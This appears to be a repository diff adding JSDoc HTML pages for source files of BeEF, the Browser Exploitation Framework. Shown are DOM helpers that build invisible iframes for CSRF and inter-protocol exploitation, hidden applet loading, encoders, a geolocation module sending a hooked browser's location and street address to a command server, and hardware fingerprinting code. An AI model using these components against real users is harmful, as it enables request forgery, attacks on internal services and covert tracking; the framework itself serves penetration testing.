rewriteTelLinks: function(new_number, selector) {
var count = 0;
var re = new RegExp("tel:/?/?.*", "gi");
var sel = (selector == null) ? 'a' : selector;
$j(sel).each(function() {
if ($j(this).attr('href') != null) {
var url = $j(this).attr('href');
if (url.match(re)) {
$j(this).attr('href', url.replace(re, "tel:"+new_number)).click(function() { return true; });
count++;
}
}
});
return count;
},
/**
* Given an array of objects (key/value), return a string of param tags ready to append in applet/object/embed
* @param {Array} an array of params for the applet, ex.: [{'argc':'5', 'arg0':'ReverseTCP'}]
* @return {String} the parameters as a string ready to append to applet/embed/object tags (ex.: &lt;param name='abc' value='test' />).
*/
parseAppletParams: function(params){
var result = '';
for (i in params){
var param = params[i];
for(key in param){
result += "&lt;param name='" + key + "' value='" + param[key] + "' />";
}
}
return result;
},
/**
* Attach an applet to the DOM, using the best approach for differet browsers (object/applet/embed).
* example usage in the code, using a JAR archive (recommended and faster):
* beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D.class', null, 'http://127.0.0.1:3000/ui/media/images/target.jar', [{'param1':'1', 'param2':'2'}]);
* example usage in the code, using codebase:
* beef.dom.attachApplet('appletId', 'appletName', 'SuperMario3D', 'http://127.0.0.1:3000/', null, null);
* @param {String} id: reference identifier to the applet.
* @param {String} code: name of the class to be loaded. For example, beef.class.
* @param {String} codebase: the URL of the codebase (usually used when loading a single class for an unsigned applet).
* @param {String} archive: the jar that contains the code.
* @param {String} params: an array of additional params that the applet except.
*/
attachApplet: function(id, name, code, codebase, archive, params) {
var content = null;
if (beef.browser.isIE()) {
content = "" + // the classid means 'use the latest JRE available to launch the applet'
"&lt;object id='" + id + "'classid='clsid:8AD9C840-044E-11D1-B3E9-00805F499D93' " +
"height='0' width='0' name='" + name + "'> " +
"&lt;param name='code' value='" + code + "' />";
if (codebase != null) {
content += "&lt;param name='codebase' value='" + codebase + "' />"
}
if (archive != null){
content += "&lt;param name='archive' value='" + archive + "' />";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "&lt;/object>";
}
if (beef.browser.isC() || beef.browser.isS() || beef.browser.isO() || beef.browser.isFF()) {
if (codebase != null) {
content = "" +
"&lt;applet id='" + id + "' code='" + code + "' " +
"codebase='" + codebase + "' " +
"height='0' width='0' name='" + name + "'>";
} else {
content = "" +
"&lt;applet id='" + id + "' code='" + code + "' " +
"archive='" + archive + "' " +
"height='0' width='0' name='" + name + "'>";
}
if (params != null) {
content += beef.dom.parseAppletParams(params);
}
content += "&lt;/applet>";
}
// For some reasons JavaPaylod is not working if the applet is attached to the DOM with the embed tag rather than the applet tag.
// if (beef.browser.isFF()) {
// if (codebase != null) {
// content = "" +
// "&lt;embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' codebase='" + codebase + "' " +
// "height='0' width='0' name='" + name + "'>";
// } else {
// content = "" +
// "&lt;embed id='" + id + "' code='" + code + "' " +
// "type='application/x-java-applet' archive='" + archive + "' " +
// "height='0' width='0' name='" + name + "'>";
// }
//
// if (params != null) {
// content += beef.dom.parseAppletParams(params);
// }
// content += "&lt;/embed>";
// }
$j('body').append(content);
},
/**
* Given an id, remove the applet from the DOM.
* @param {String} id: reference identifier to the applet.
*/
detachApplet: function(id) {
$j('#' + id + '').detach();
},
/**
* Create an invisible iFrame with a form inside, and submit it. Useful for XSRF attacks delivered via POST requests.
* @param {String} action: the form action attribute, where the request will be sent.
* @param {String} method: HTTP method, usually POST.
* @param {String} enctype: form encoding type
* @param {Array} inputs: an array of inputs to be added to the form (type, name, value).
* example: [{'type':'hidden', 'name':'1', 'value':''} , {'type':'hidden', 'name':'2', 'value':'3'}]
*/
createIframeXsrfForm: function(action, method, enctype, inputs){
var iframeXsrf = beef.dom.createInvisibleIframe();
var formXsrf = document.createElement('form');
formXsrf.setAttribute('action', action);
formXsrf.setAttribute('method', method);
formXsrf.setAttribute('enctype', enctype);
var input = null;
for (i in inputs){
var attributes = inputs[i];
input = document.createElement('input');
for(key in attributes){
if (key == 'name' &amp;&amp; attributes[key] == 'submit') {
// workaround for https://github.com/beefproject/beef/issues/1117
beef.debug("createIframeXsrfForm - warning: changed form input 'submit' to 'Submit'");
input.setAttribute('Submit', attributes[key]);
} else {
input.setAttribute(key, attributes[key]);
}
}
formXsrf.appendChild(input);
}
iframeXsrf.contentWindow.document.body.appendChild(formXsrf);
formXsrf.submit();
return iframeXsrf;
},
/**
* Create an invisible iFrame with a form inside, and POST the form in plain-text. Used for inter-protocol exploitation.
* @param {String} rhost: remote host ip/domain
* @param {String} rport: remote port
* @param {String} commands: protocol commands to be executed by the remote host:port service
*/
createIframeIpecForm: function(rhost, rport, path, commands){
var iframeIpec = beef.dom.createInvisibleIframe();
var formIpec = document.createElement('form');
formIpec.setAttribute('action', 'http://'+rhost+':'+rport+path);
formIpec.setAttribute('method', 'POST');
formIpec.setAttribute('enctype', 'multipart/form-data');
input = document.createElement('textarea');
input.setAttribute('name', Math.random().toString(36).substring(5));
input.value = commands;
formIpec.appendChild(input);
iframeIpec.contentWindow.document.body.appendChild(formIpec);
formIpec.submit();
return iframeIpec;
}
};
beef.regCmp('beef.dom');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

223
docs/encode_base64.js.html Normal file
View File

@@ -0,0 +1,223 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: encode/base64.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: encode/base64.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
// Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
beef.encode = {};
/**
* Base64 code from http://stackoverflow.com/questions/3774622/how-to-base64-encode-inside-of-javascript/3774662#3774662
* @namespace beef.encode.base64
*/
beef.encode.base64 = {
keyStr: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=",
/**
* @memberof beef.encode.base64
* @param {string} input
* @return {string}
*/
encode : function (input) {
if (window.btoa) {
return btoa(unescape(encodeURIComponent(input)));
}
var output = "";
var chr1, chr2, chr3, enc1, enc2, enc3, enc4;
var i = 0;
input = beef.encode.base64.utf8_encode(input);
while (i &lt; input.length) {
chr1 = input.charCodeAt(i++);
chr2 = input.charCodeAt(i++);
chr3 = input.charCodeAt(i++);
enc1 = chr1 >> 2;
enc2 = ((chr1 &amp; 3) &lt;&lt; 4) | (chr2 >> 4);
enc3 = ((chr2 &amp; 15) &lt;&lt; 2) | (chr3 >> 6);
enc4 = chr3 &amp; 63;
if (isNaN(chr2)) {
enc3 = enc4 = 64;
} else if (isNaN(chr3)) {
enc4 = 64;
}
output = output +
this.keyStr.charAt(enc1) + this.keyStr.charAt(enc2) +
this.keyStr.charAt(enc3) + this.keyStr.charAt(enc4);
}
return output;
},
/**
* @memberof beef.encode.base64
* @param {string} input
* @return {string}
*/
decode : function (input) {
if (window.atob) {
return escape(atob(input));
}
var output = "";
var chr1, chr2, chr3;
var enc1, enc2, enc3, enc4;
var i = 0;
input = input.replace(/[^A-Za-z0-9\+\/\=]/g, "");
while (i &lt; input.length) {
enc1 = this.keyStr.indexOf(input.charAt(i++));
enc2 = this.keyStr.indexOf(input.charAt(i++));
enc3 = this.keyStr.indexOf(input.charAt(i++));
enc4 = this.keyStr.indexOf(input.charAt(i++));
chr1 = (enc1 &lt;&lt; 2) | (enc2 >> 4);
chr2 = ((enc2 &amp; 15) &lt;&lt; 4) | (enc3 >> 2);
chr3 = ((enc3 &amp; 3) &lt;&lt; 6) | enc4;
output = output + String.fromCharCode(chr1);
if (enc3 != 64) {
output = output + String.fromCharCode(chr2);
}
if (enc4 != 64) {
output = output + String.fromCharCode(chr3);
}
}
output = beef.encode.base64.utf8_decode(output);
return output;
},
/**
* @memberof beef.encode.base64
* @param {string} string
* @return {string}
*/
utf8_encode : function (string) {
string = string.replace(/\r\n/g,"\n");
var utftext = "";
for (var n = 0; n &lt; string.length; n++) {
var c = string.charCodeAt(n);
if (c &lt; 128) {
utftext += String.fromCharCode(c);
}
else if((c > 127) &amp;&amp; (c &lt; 2048)) {
utftext += String.fromCharCode((c >> 6) | 192);
utftext += String.fromCharCode((c &amp; 63) | 128);
}
else {
utftext += String.fromCharCode((c >> 12) | 224);
utftext += String.fromCharCode(((c >> 6) &amp; 63) | 128);
utftext += String.fromCharCode((c &amp; 63) | 128);
}
}
return utftext;
},
/**
* @memberof beef.encode.base64
* @param {string} utftext
* @return {string}
*/
utf8_decode : function (utftext) {
var string = "";
var i = 0;
var c = c1 = c2 = 0;
while ( i &lt; utftext.length ) {
c = utftext.charCodeAt(i);
if (c &lt; 128) {
string += String.fromCharCode(c);
i++;
}
else if((c > 191) &amp;&amp; (c &lt; 224)) {
c2 = utftext.charCodeAt(i+1);
string += String.fromCharCode(((c &amp; 31) &lt;&lt; 6) | (c2 &amp; 63));
i += 2;
}
else {
c2 = utftext.charCodeAt(i+1);
c3 = utftext.charCodeAt(i+2);
string += String.fromCharCode(((c &amp; 15) &lt;&lt; 12) | ((c2 &amp; 63) &lt;&lt; 6) | (c3 &amp; 63));
i += 3;
}
}
return string;
}
};
beef.regCmp('beef.encode.base64');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

191
docs/encode_json.js.html Normal file
View File

@@ -0,0 +1,191 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: encode/json.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: encode/json.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Json code from Brantlye Harris-- http://code.google.com/p/jquery-json/
* @namespace beef.encode.json
*/
beef.encode.json = {
/**
* @memberof beef.encode.json
* @param o
*/
stringify: function(o) {
if (typeof(JSON) == 'object' &amp;&amp; JSON.stringify) {
// Error on stringifying cylcic structures caused polling to die
try {
s = JSON.stringify(o);
} catch(error) {
// TODO log error / handle cyclic structures?
}
return s;
}
var type = typeof(o);
if (o === null)
return "null";
if (type == "undefined")
return '\"\"';
if (type == "number" || type == "boolean")
return o + "";
if (type == "string")
return $j.quoteString(o);
if (type == 'object')
{
if (typeof o.toJSON == "function")
return $j.toJSON( o.toJSON() );
if (o.constructor === Date)
{
var month = o.getUTCMonth() + 1;
if (month &lt; 10) month = '0' + month;
var day = o.getUTCDate();
if (day &lt; 10) day = '0' + day;
var year = o.getUTCFullYear();
var hours = o.getUTCHours();
if (hours &lt; 10) hours = '0' + hours;
var minutes = o.getUTCMinutes();
if (minutes &lt; 10) minutes = '0' + minutes;
var seconds = o.getUTCSeconds();
if (seconds &lt; 10) seconds = '0' + seconds;
var milli = o.getUTCMilliseconds();
if (milli &lt; 100) milli = '0' + milli;
if (milli &lt; 10) milli = '0' + milli;
return '"' + year + '-' + month + '-' + day + 'T' +
hours + ':' + minutes + ':' + seconds +
'.' + milli + 'Z"';
}
if (o.constructor === Array)
{
var ret = [];
for (var i = 0; i &lt; o.length; i++)
ret.push( $j.toJSON(o[i]) || "null" );
return "[" + ret.join(",") + "]";
}
var pairs = [];
for (var k in o) {
var name;
var type = typeof k;
if (type == "number")
name = '"' + k + '"';
else if (type == "string")
name = $j.quoteString(k);
else
continue; //skip non-string or number keys
if (typeof o[k] == "function")
continue; //skip pairs where the value is a function.
var val = $j.toJSON(o[k]);
pairs.push(name + ":" + val);
}
return "{" + pairs.join(", ") + "}";
}
},
/**
* @memberof beef.encode.json
* @param string
*/
quoteString: function(string) {
if (string.match(this._escapeable))
{
return '"' + string.replace(this._escapeable, function (a)
{
var c = this._meta[a];
if (typeof c === 'string') return c;
c = a.charCodeAt();
return '\\u00' + Math.floor(c / 16).toString(16) + (c % 16).toString(16);
}) + '"';
}
return '"' + string + '"';
},
_escapeable: /["\\\x00-\x1f\x7f-\x9f]/g,
_meta : {
'\b': '\\b',
'\t': '\\t',
'\n': '\\n',
'\f': '\\f',
'\r': '\\r',
'"' : '\\"',
'\\': '\\\\'
}
};
$j.toJSON = function(o) {return beef.encode.json.stringify(o);};
$j.quoteString = function(o) {return beef.encode.json.quoteString(o);};
beef.regCmp('beef.encode.json');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

BIN
docs/fonts/OpenSans-Bold-webfont.eot Normal file
View File

Binary file not shown.

1830
docs/fonts/OpenSans-Bold-webfont.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 116 KiB

BIN
docs/fonts/OpenSans-Bold-webfont.woff Normal file
View File

Binary file not shown.

BIN
docs/fonts/OpenSans-BoldItalic-webfont.eot Normal file
View File

Binary file not shown.

1830
docs/fonts/OpenSans-BoldItalic-webfont.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 118 KiB

BIN
docs/fonts/OpenSans-BoldItalic-webfont.woff Normal file
View File

Binary file not shown.

BIN
docs/fonts/OpenSans-Italic-webfont.eot Normal file
View File

Binary file not shown.

1830
docs/fonts/OpenSans-Italic-webfont.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 120 KiB

BIN
docs/fonts/OpenSans-Italic-webfont.woff Normal file
View File

Binary file not shown.

BIN
docs/fonts/OpenSans-Light-webfont.eot Normal file
View File

Binary file not shown.

1831
docs/fonts/OpenSans-Light-webfont.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 114 KiB

BIN
docs/fonts/OpenSans-Light-webfont.woff Normal file
View File

Binary file not shown.

BIN
docs/fonts/OpenSans-LightItalic-webfont.eot Normal file
View File

Binary file not shown.

1835
docs/fonts/OpenSans-LightItalic-webfont.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 120 KiB

BIN
docs/fonts/OpenSans-LightItalic-webfont.woff Normal file
View File

Binary file not shown.

BIN
docs/fonts/OpenSans-Regular-webfont.eot Normal file
View File

Binary file not shown.

1831
docs/fonts/OpenSans-Regular-webfont.svg Normal file
View File

File diff suppressed because it is too large Load Diff
Side by Side

After

Width:  |  Height:  |  Size: 117 KiB

BIN
docs/fonts/OpenSans-Regular-webfont.woff Normal file
View File

Binary file not shown.

159
docs/geolocation.js.html Normal file
View File

@@ -0,0 +1,159 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: geolocation.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: geolocation.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* Provides functionalities to use the geolocation API.
* @namespace beef.geolocation
*/
beef.geolocation = {
/**
* Check if browser supports the geolocation API
* @return {boolean}
*/
isGeolocationEnabled: function(){
return !!navigator.geolocation;
},
/**
* Given latitude/longitude retrieves exact street position of the zombie
* @param command_url
* @param command_id
* @param latitude
* @param longitude
*/
getOpenStreetMapAddress: function(command_url, command_id, latitude, longitude){
// fixes damned issues with jquery 1.5, like this one:
// http://bugs.jquery.com/ticket/8084
$j.ajaxSetup({
jsonp: null,
jsonpCallback: null
});
$j.ajax({
error: function(xhr, status, error){
beef.debug("[geolocation.js] openstreetmap error");
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&amp;longitude=" + longitude
+ "&amp;osm=UNAVAILABLE"
+ "&amp;geoLocEnabled=True");
},
success: function(data, status, xhr){
beef.debug("[geolocation.js] openstreetmap success");
//var jsonResp = $j.parseJSON(data);
beef.net.send(command_url, command_id, "latitude=" + latitude
+ "&amp;longitude=" + longitude
// + "&amp;osm=" + encodeURI(jsonResp.display_name)
+ "&amp;osm=" + data.display_name
+ "&amp;geoLocEnabled=True");
},
type: "get",
dataType: "json",
url: "https://nominatim.openstreetmap.org/reverse?format=jsonv2&amp;lat=" +
latitude + "&amp;lon=" + longitude + "&amp;zoom=18&amp;addressdetails=1"
});
},
/**
* Retrieve latitude/longitude using the geolocation API
* @param command_url
* @param command_id
*/
getGeolocation: function (command_url, command_id){
if (!navigator.geolocation) {
beef.net.send(command_url, command_id, "latitude=NOT_ENABLED&amp;longitude=NOT_ENABLED&amp;geoLocEnabled=False");
return;
}
beef.debug("[geolocation.js] navigator.geolocation.getCurrentPosition");
navigator.geolocation.getCurrentPosition( //note: this is an async call
function(position){ // success
var latitude = position.coords.latitude;
var longitude = position.coords.longitude;
beef.debug("[geolocation.js] success getting position. latitude [%d], longitude [%d]", latitude, longitude);
beef.geolocation.getOpenStreetMapAddress(command_url, command_id, latitude, longitude);
}, function(error){ // failure
beef.debug("[geolocation.js] error [%d] getting position", error.code);
switch(error.code) // Returns 0-3
{
case 0:
beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&amp;longitude=UNKNOWN_ERROR&amp;geoLocEnabled=False");
return;
case 1:
beef.net.send(command_url, command_id, "latitude=PERMISSION_DENIED&amp;longitude=PERMISSION_DENIED&amp;geoLocEnabled=False");
return;
case 2:
beef.net.send(command_url, command_id, "latitude=POSITION_UNAVAILABLE&amp;longitude=POSITION_UNAVAILABLE&amp;geoLocEnabled=False");
return;
case 3:
beef.net.send(command_url, command_id, "latitude=TIMEOUT&amp;longitude=TIMEOUT&amp;geoLocEnabled=False");
return;
}
beef.net.send(command_url, command_id, "latitude=UNKNOWN_ERROR&amp;longitude=UNKNOWN_ERROR&amp;geoLocEnabled=False");
},
{enableHighAccuracy:true, maximumAge:30000, timeout:27000}
);
}
}
beef.regCmp('beef.geolocation');
</code></pre>
</article>
</section>
</div>
<nav>
<h2><a href="index.html">Home</a></h2><h3>Namespaces</h3><ul><li><a href="beef.are.html">are</a></li><li><a href="beef.browser.html">browser</a></li><li><a href="beef.browser.cookie.html">cookie</a></li><li><a href="beef.browser.popup.html">popup</a></li><li><a href="beef.dom.html">dom</a></li><li><a href="beef.encode.base64.html">base64</a></li><li><a href="beef.encode.json.html">json</a></li><li><a href="beef.geolocation.html">geolocation</a></li><li><a href="beef.hardware.html">hardware</a></li><li><a href="beef.init.html">init</a></li><li><a href="beef.logger.html">logger</a></li><li><a href="beef.mitb.html">mitb</a></li><li><a href="beef.net.html">net</a></li><li><a href="beef.net.connection.html">connection</a></li><li><a href="beef.net.cors.html">cors</a></li><li><a href="beef.net.dns.html">dns</a></li><li><a href="beef.net.local.html">local</a></li><li><a href="beef.net.portscanner.html">portscanner</a></li><li><a href="beef.net.requester.html">requester</a></li><li><a href="beef.net.xssrays.html">xssrays</a></li><li><a href="beef.os.html">os</a></li><li><a href="beef.session.html">session</a></li><li><a href="beef.timeout.html">timeout</a></li><li><a href="beef.updater.html">updater</a></li><li><a href="beef.webrtc.html">webrtc</a></li><li><a href="beef.websocket.html">websocket</a></li><li><a href="BeefJS.html">BeefJS</a></li><li><a href="browser_jools.html">browser_jools</a></li><li><a href="platform.html">platform</a></li></ul>
</nav>
<br class="clear">
<footer>
Documentation generated by <a href="https://github.com/jsdoc/jsdoc">JSDoc 3.6.3</a> on Thu Jan 02 2020 16:29:11 GMT+1000 (Australian Eastern Standard Time)
</footer>
<script> prettyPrint(); </script>
<script src="scripts/linenumber.js"> </script>
</body>
</html>

368
docs/hardware.js.html Normal file
View File

@@ -0,0 +1,368 @@
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="utf-8">
<title>JSDoc: Source: hardware.js</title>
<script src="scripts/prettify/prettify.js"> </script>
<script src="scripts/prettify/lang-css.js"> </script>
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
<link type="text/css" rel="stylesheet" href="styles/prettify-tomorrow.css">
<link type="text/css" rel="stylesheet" href="styles/jsdoc-default.css">
</head>
<body>
<div id="main">
<h1 class="page-title">Source: hardware.js</h1>
<section>
<article>
<pre class="prettyprint source linenums"><code>//
// Copyright (c) 2006-2019 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
* @namespace beef.hardware
*/
beef.hardware = {
ua: navigator.userAgent,
/**
* @return {String} CPU type
*/
getCpuArch: function() {
var arch = 'UNKNOWN';
// note that actually WOW64 means IE 32bit and Windows 64 bit. we are more interested
// in detecting the OS arch rather than the browser build
if (navigator.userAgent.match('(WOW64|x64|x86_64)') || navigator.platform.toLowerCase() == "win64"){
arch = 'x86_64';
}else if(typeof navigator.cpuClass != 'undefined'){
switch (navigator.cpuClass) {
case '68K':
arch = 'Motorola 68K';
break;
case 'PPC':
arch = 'Motorola PPC';
break;
case 'Digital':
arch = 'Alpha';
break;
default:
arch = 'x86';
}
}
// TODO we can infer the OS is 64 bit, if we first detect the OS type (os.js).
// For example, if OSX is at least 10.7, most certainly is 64 bit.
return arch;
},
/**
* Returns number of CPU cores
* @return {String}
*/
getCpuCores: function() {
var cores = 'unknown';
try {
if(typeof navigator.hardwareConcurrency != 'undefined') {
cores = navigator.hardwareConcurrency;
}
} catch(e) {
cores = 'unknown';
}
return cores;
},
/**
* Returns CPU details
* @return {String}
*/
getCpuDetails: function() {
return {
arch: beef.hardware.getCpuArch(),
cores: beef.hardware.getCpuCores()
}
},
/**
* Returns GPU details
* @return {object}
*/
getGpuDetails: function() {
var gpu = 'unknown';
var vendor = 'unknown';
// use canvas technique:
// https://github.com/Valve/fingerprintjs2
// http://codeflow.org/entries/2016/feb/10/webgl_debug_renderer_info-extension-survey-results/
try {
var getWebglCanvas = function () {
var canvas = document.createElement('canvas')
var gl = null
try {
gl = canvas.getContext('webgl') || canvas.getContext('experimental-webgl')
} catch (e) { }
if (!gl) { gl = null }
return gl;
}
var glContext = getWebglCanvas();
var extensionDebugRendererInfo = glContext.getExtension('WEBGL_debug_renderer_info');
var gpu = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_RENDERER_WEBGL);
var vendor = glContext.getParameter(extensionDebugRendererInfo.UNMASKED_VENDOR_WEBGL);
beef.debug("GPU: " + gpu + " - Vendor: " + vendor);
} catch (e) {
beef.debug('Failed to detect WebGL renderer: ' + e.toString());
}
return {
gpu: gpu,
vendor: vendor
}
},
/**
* Returns RAM (GiB)
* @return {String}
*/
getMemory: function() {
var memory = 'unknown';
try {
if(typeof navigator.deviceMemory != 'undefined') {
memory = navigator.deviceMemory;
}
} catch(e) {
memory = 'unknown';
}
return memory;
},
/**
* Returns battery details
* @return {Object}
*/
getBatteryDetails: function() {
var battery = navigator.battery || navigator.webkitBattery || navigator.mozBattery;
if (!!battery) {
return {
chargingStatus: battery.charging,
batteryLevel: battery.level * 100 + "%",
chargingTime: battery.chargingTime,
dischargingTime: battery.dischargingTime
}
} else {
return {
chargingStatus: 'unknown',
batteryLevel: 'unknown',
chargingTime: 'unknown',
dischargingTime: 'unknown'
}
}
},
/**
* Returns zombie screen size and color depth.
* @return {Object}
*/
getScreenSize: function () {
return {
width: window.screen.width,
height: window.screen.height,
colordepth: window.screen.colorDepth
}
},
/**
* Is touch enabled?
* @return {Boolean} true or false.
*/
isTouchEnabled: function() {
if ('ontouchstart' in document) return true;
return false;
},
/**
* Is virtual machine?
* @return {Boolean} true or false.
*/
isVirtualMachine: function() {
if (this.getGpuDetails().vendor.match('VMware, Inc'))
return true;
if (this.isMobileDevice())
return false;
// if the screen resolution is uneven, and it's not a known mobile device
// then it's probably a VM
if (screen.width % 2 || screen.height % 2)
return true;
return false;
},
/**
* Is a Laptop?
* @return {Boolean} true or false.
*/
isLaptop: function() {
if (this.isMobileDevice()) return false;
// Most common laptop screen resolution
